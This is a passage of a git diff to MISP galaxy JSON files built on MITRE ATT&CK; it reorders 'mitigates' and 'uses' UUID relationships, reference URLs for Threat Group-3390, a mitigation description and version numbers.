], - "type": "mitigates" - }, - { - "dest-uuid": "79eec66a-9bd0-4a3f-ac82-19159e94bd44", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "mitigates" - }, - { - "dest-uuid": "77e30eee-fd48-40b4-99ec-73e97c158b58", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "mitigates" - }, - { - "dest-uuid": "d9db3d46-66ca-44b4-9daa-1ef97cb7465a", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "mitigates" - }, - { - "dest-uuid": "99e6295e-741b-4857-b6e5-64989eb039b4", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "mitigates" - }, - { - "dest-uuid": "d731c21e-f27d-4756-b418-0e2aaabd6d63", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "mitigates" - }, { "dest-uuid": "1b51f5bc-b97a-498a-8dbd-bc6b1901bf19", "tags": [ @@ -5162,14 +5724,7 @@ "type": "mitigates" }, { - "dest-uuid": "4e6620ac-c30c-4f6d-918e-fa20cae7c1ce", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "mitigates" - }, - { - "dest-uuid": "bd4d32f5-eed4-4018-a649-40b229dd1d69", + "dest-uuid": "3b0b604f-10db-41a0-b54c-493124d455b9", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -5181,104 +5736,6 @@ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "mitigates" - }, - { - "dest-uuid": "d9e88203-2b5d-405f-a406-2933b1e3d7e4", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "mitigates" - }, - { - "dest-uuid": "9d7c32f4-ab39-49dc-8055-8106bc2294a1", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "mitigates" - }, - { - "dest-uuid": "62adb627-f647-498e-b4cc-41499361bacb", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "mitigates" - }, - { - "dest-uuid": "198ce408-1470-45ee-b47f-7056050d4fc2", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "mitigates" - }, - { - "dest-uuid": "6c49d50f-494d-4150-b774-a655022d20a6", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "mitigates" - }, - { - "dest-uuid": "6683aa0c-d98a-4f5b-ac57-ca7e9934a760", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "mitigates" - }, - { - "dest-uuid": "8e27551a-5080-4148-a584-c64348212e4f", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "mitigates" - }, - { - "dest-uuid": "2204c371-6100-4ae0-82f3-25c07c29772a", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "mitigates" - }, - { - "dest-uuid": "29e07491-8947-43a3-8d4e-9a787c45f3d3", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "mitigates" - }, - { - "dest-uuid": "351c0927-2fc1-4a2c-ad84-cbbee7eb8172", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "mitigates" - }, - { - "dest-uuid": "d4536441-1bcc-49fa-80ae-a596ed3f7ffd", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "mitigates" - }, - { - "dest-uuid": "a8c31121-852b-46bd-9ba4-674ae5afe7ad", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "mitigates" - }, - { - "dest-uuid": "8f0e39c6-82c9-41ec-9f93-5696c0f2e274", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "mitigates" - }, - { - "dest-uuid": "8f142a25-f6c3-4520-bd50-2ae3ab50ed3e", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "mitigates" } ], "uuid": "1553b156-6767-47f7-9eb4-2a692505666d", @@ -5301,7 +5758,7 @@ "type": "mitigates" }, { - "dest-uuid": "a8c31121-852b-46bd-9ba4-674ae5afe7ad", + "dest-uuid": "6f86d346-f092-4abc-80df-8558a90c426a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -5314,6 +5771,27 @@ ], "type": "mitigates" }, + { + "dest-uuid": "a8c31121-852b-46bd-9ba4-674ae5afe7ad", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "mitigates" + }, + { + "dest-uuid": "0c71033e-401e-4b97-9309-7a7c95e43a5d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "mitigates" + }, + { + "dest-uuid": "cde2cb84-455e-410c-8aa9-086f2788bcd2", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "mitigates" + }, { "dest-uuid": "667e5707-3843-4da8-bd34-88b922526f0d", "tags": [ @@ -5328,13 +5806,6 @@ ], "type": "mitigates" }, - { - "dest-uuid": "cde2cb84-455e-410c-8aa9-086f2788bcd2", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "mitigates" - }, { "dest-uuid": "53263a67-075e-48fa-974b-91c5b5445db7", "tags": [ @@ -5342,20 +5813,6 @@ ], "type": "mitigates" }, - { - "dest-uuid": "0c71033e-401e-4b97-9309-7a7c95e43a5d", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "mitigates" - }, - { - "dest-uuid": "6f86d346-f092-4abc-80df-8558a90c426a", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "mitigates" - }, { "dest-uuid": "537ea573-8a1c-468c-956b-d16d2ed9d067", "tags": [ @@ -5384,14 +5841,14 @@ "type": "mitigates" }, { - "dest-uuid": "667e5707-3843-4da8-bd34-88b922526f0d", + "dest-uuid": "53263a67-075e-48fa-974b-91c5b5445db7", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "mitigates" }, { - "dest-uuid": "dfe29258-ce59-421c-9dee-e85cb9fa90cd", + "dest-uuid": "667e5707-3843-4da8-bd34-88b922526f0d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -5405,7 +5862,7 @@ "type": "mitigates" }, { - "dest-uuid": "53263a67-075e-48fa-974b-91c5b5445db7", + "dest-uuid": "dfe29258-ce59-421c-9dee-e85cb9fa90cd", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -5469,7 +5926,7 @@ "value": "Rootkit Mitigation - T1014" }, { - "description": "Mshta.exe may not be necessary within a given environment since its functionality is tied to older versions of Internet Explorer which have reached end of life. Use application whitelisting configured to block execution of mshta.exe if it is not required for a given system or network to prevent potential misuse by adversaries.", + "description": "Mshta.exe may not be necessary within a given environment since its functionality is tied to older versions of Internet Explorer that have reached end of life. Use application whitelisting configured to block execution of mshta.exe if it is not required for a given system or network to prevent potential misuse by adversaries.", "meta": { "external_id": "T1170", "refs": [ @@ -5951,5 +6408,5 @@ "value": "Attestation - M1002" } ], - "version": 10 + "version": 12 } diff --git a/clusters/mitre-enterprise-attack-course-of-action.json b/clusters/mitre-enterprise-attack-course-of-action.json index 69a4f2f..2fadd8f 100644 --- a/clusters/mitre-enterprise-attack-course-of-action.json +++ b/clusters/mitre-enterprise-attack-course-of-action.json @@ -973,6 +973,13 @@ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "mitigates" + }, + { + "dest-uuid": "767dbf9e-df3f-45cb-8998-4903ab5f80c0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "mitigates" } ], "uuid": "16f144e4-c780-4ed2-98b4-55d14e2dfa44", @@ -3665,5 +3672,5 @@ "value": "Security Software Discovery Mitigation - T1063" } ], - "version": 6 + "version": 7 } diff --git a/clusters/mitre-intrusion-set.json b/clusters/mitre-intrusion-set.json index db80e2e..c68b99f 100644 --- a/clusters/mitre-intrusion-set.json +++ b/clusters/mitre-intrusion-set.json @@ -16,11 +16,11 @@ "refs": [ "https://attack.mitre.org/groups/G0027", "https://www.secureworks.com/research/threat-group-3390-targets-organizations-for-cyberespionage", - "http://arstechnica.com/security/2015/08/newly-discovered-chinese-hacking-group-hacked-100-websites-to-use-as-watering-holes/", "https://www.secureworks.com/research/bronze-union", - "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/may/emissary-panda-a-potential-new-malicious-tool/", + "https://securelist.com/luckymouse-hits-national-data-center/86083/", "https://thehackernews.com/2018/06/chinese-watering-hole-attack.html", - "https://securelist.com/luckymouse-hits-national-data-center/86083/" + "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/may/emissary-panda-a-potential-new-malicious-tool/", + "http://arstechnica.com/security/2015/08/newly-discovered-chinese-hacking-group-hacked-100-websites-to-use-as-watering-holes/" ], "synonyms": [ "Threat Group-3390", @@ -62,21 +62,7 @@ "type": "uses" }, { - "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "b9f5dbe2-4c55-4fc5-af2e-d42c1d182ec4", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "dest-uuid": "e358d692-23c0-4a31-9eb6-ecc13a8d7735", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -90,49 +76,14 @@ "type": "uses" }, { - "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", + "dest-uuid": "a60657fa-e2e7-4f8f-8128-a882534ae8c5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "ca1a3f50-5ebd-41f8-8320-2c7d6a6e88be", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "e358d692-23c0-4a31-9eb6-ecc13a8d7735", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "5a3a31fe-5a8f-48e1-bff0-a753e5b1be70", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "afc079f3-c0ea-4096-b75d-3f05338b7f60", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "b2001907-166b-4d71-bb3c-9d26c871de09", + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -146,7 +97,77 @@ "type": "uses" }, { - "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", + "dest-uuid": "6aabc5ec-eae6-422c-8311-38d45ee9838a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "46944654-fcc1-4f63-9dad-628102376586", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "03342581-f790-4f03-ba41-e82e67392e23", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f4882e23-8aa7-4b12-b28a-b349c12ee9e0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b2001907-166b-4d71-bb3c-9d26c871de09", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7e150503-88e7-4861-866b-ff1ac82c4475", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "10d51417-ee35-4589-b1ff-b6df1c334e8d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "ca1a3f50-5ebd-41f8-8320-2c7d6a6e88be", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -167,28 +188,49 @@ "type": "uses" }, { - "dest-uuid": "46944654-fcc1-4f63-9dad-628102376586", + "dest-uuid": "c3888c54-775d-4b2f-b759-75a2ececcbfd", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "d742a578-d70e-4d0e-96a6-02a9c30204e6", + "dest-uuid": "b9f5dbe2-4c55-4fc5-af2e-d42c1d182ec4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "a60657fa-e2e7-4f8f-8128-a882534ae8c5", + "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e7eab98d-ae11-4491-bd28-a53ba875865a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -202,21 +244,63 @@ "type": "uses" }, { - "dest-uuid": "c3888c54-775d-4b2f-b759-75a2ececcbfd", + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "10d51417-ee35-4589-b1ff-b6df1c334e8d", + "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "f4882e23-8aa7-4b12-b28a-b349c12ee9e0", + "dest-uuid": "d742a578-d70e-4d0e-96a6-02a9c30204e6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "64fa0de0-6240-41f4-8638-f4ca7ed528fd", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "3c4a2599-71ee-4405-ba1e-0e28414b4bc5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "56f46b17-8cfa-46c0-b501-dd52fef394e2", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7dd95ff6-712e-4056-9626-312ea4ab4c5e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -230,7 +314,21 @@ "type": "uses" }, { - "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", + "dest-uuid": "2e0dd10b-676d-4964-acd0-8a404c92b044", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "242f3da3-4425-4d11-8f5c-b842886da966", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "35dd844a-b219-4e2b-a6bb-efa9a75995a9", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -251,56 +349,14 @@ "type": "uses" }, { - "dest-uuid": "56f46b17-8cfa-46c0-b501-dd52fef394e2", + "dest-uuid": "c32f7008-9fea-41f7-8366-5eb9b74bd896", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "03342581-f790-4f03-ba41-e82e67392e23", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "e3a12395-188d-4051-9a16-ea8e14d07b88", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7dd95ff6-712e-4056-9626-312ea4ab4c5e", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "e7eab98d-ae11-4491-bd28-a53ba875865a", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", + "dest-uuid": "e066bf86-9cfb-407a-9d25-26fd5d91e360", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -314,77 +370,21 @@ "type": "uses" }, { - "dest-uuid": "64fa0de0-6240-41f4-8638-f4ca7ed528fd", + "dest-uuid": "5a3a31fe-5a8f-48e1-bff0-a753e5b1be70", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "242f3da3-4425-4d11-8f5c-b842886da966", + "dest-uuid": "afc079f3-c0ea-4096-b75d-3f05338b7f60", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "35dd844a-b219-4e2b-a6bb-efa9a75995a9", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "3c4a2599-71ee-4405-ba1e-0e28414b4bc5", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7e150503-88e7-4861-866b-ff1ac82c4475", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "2e0dd10b-676d-4964-acd0-8a404c92b044", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "6aabc5ec-eae6-422c-8311-38d45ee9838a", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "c32f7008-9fea-41f7-8366-5eb9b74bd896", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "e066bf86-9cfb-407a-9d25-26fd5d91e360", + "dest-uuid": "e3a12395-188d-4051-9a16-ea8e14d07b88", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -423,7 +423,7 @@ "type": "uses" }, { - "dest-uuid": "ffe742ed-9100-4686-9e00-c331da544787", + "dest-uuid": "03342581-f790-4f03-ba41-e82e67392e23", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -444,7 +444,7 @@ "type": "uses" }, { - "dest-uuid": "03342581-f790-4f03-ba41-e82e67392e23", + "dest-uuid": "ffe742ed-9100-4686-9e00-c331da544787", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -478,28 +478,7 @@ }, "related": [ { - "dest-uuid": "d742a578-d70e-4d0e-96a6-02a9c30204e6", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "e01be9c5-e763-4caf-aeb7-000b416aef67", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "a10641f4-87b4-45a3-a906-92a149cb2c27", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "35dd844a-b219-4e2b-a6bb-efa9a75995a9", + "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -513,98 +492,7 @@ "type": "uses" }, { - "dest-uuid": "c32f7008-9fea-41f7-8366-5eb9b74bd896", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7dd95ff6-712e-4056-9626-312ea4ab4c5e", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "dc31fe1e-d722-49da-8f5f-92c7b5aff534", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "5a63f900-5e7e-4928-a746-dd4558e1df71", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "f4882e23-8aa7-4b12-b28a-b349c12ee9e0", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "2e0dd10b-676d-4964-acd0-8a404c92b044", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "51dea151-0898-4a45-967c-3ebee0420484", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "1608f3e1-598a-42f4-a01a-2e252e81728f", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "03342581-f790-4f03-ba41-e82e67392e23", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "6aac77c4-eaf2-4366-8c13-ce50ab951f38", + "dest-uuid": "8c32eb4d-805f-4fc5-bf60-c4d476c131b5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -618,63 +506,21 @@ "type": "uses" }, { - "dest-uuid": "970cdb5c-02fb-4c38-b17e-d6327cf3c810", + "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "799ace7f-e227-4411-baa0-8868704f2a69", + "dest-uuid": "e01be9c5-e763-4caf-aeb7-000b416aef67", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "3489cfc5-640f-4bb3-a103-9137b97de79f", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "10d51417-ee35-4589-b1ff-b6df1c334e8d", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "b77cf5f3-6060-475d-bd60-40ccbf28fdc2", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7fd87010-3a00-4da3-b905-410525e8ec44", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", + "dest-uuid": "2e0dd10b-676d-4964-acd0-8a404c92b044", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -688,7 +534,28 @@ "type": "uses" }, { - "dest-uuid": "a93494bb-4b80-4ea1-8695-3236a49916fd", + "dest-uuid": "dc31fe1e-d722-49da-8f5f-92c7b5aff534", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "1608f3e1-598a-42f4-a01a-2e252e81728f", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "d742a578-d70e-4d0e-96a6-02a9c30204e6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -702,63 +569,14 @@ "type": "uses" }, { - "dest-uuid": "3c4a2599-71ee-4405-ba1e-0e28414b4bc5", + "dest-uuid": "799ace7f-e227-4411-baa0-8868704f2a69", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "f879d51c-5476-431c-aedf-f14d207e4d1e", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "8c32eb4d-805f-4fc5-bf60-c4d476c131b5", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "ff6caf67-ea1f-4895-b80e-4bb0fc31c6db", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "20138b9d-1aac-4a26-8654-a36b6bbf2bba", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "c16e5409-ee53-4d79-afdc-4099dc9292df", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "72b74d71-8169-42aa-92e0-e7b04b9f5a08", + "dest-uuid": "35dd844a-b219-4e2b-a6bb-efa9a75995a9", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -772,7 +590,77 @@ "type": "uses" }, { - "dest-uuid": "b9f5dbe2-4c55-4fc5-af2e-d42c1d182ec4", + "dest-uuid": "3489cfc5-640f-4bb3-a103-9137b97de79f", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "26c87906-d750-42c5-946c-d4162c73fc7b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "3c4a2599-71ee-4405-ba1e-0e28414b4bc5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "c32f7008-9fea-41f7-8366-5eb9b74bd896", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b77cf5f3-6060-475d-bd60-40ccbf28fdc2", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "ff6caf67-ea1f-4895-b80e-4bb0fc31c6db", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7fd87010-3a00-4da3-b905-410525e8ec44", + "tags": [ + 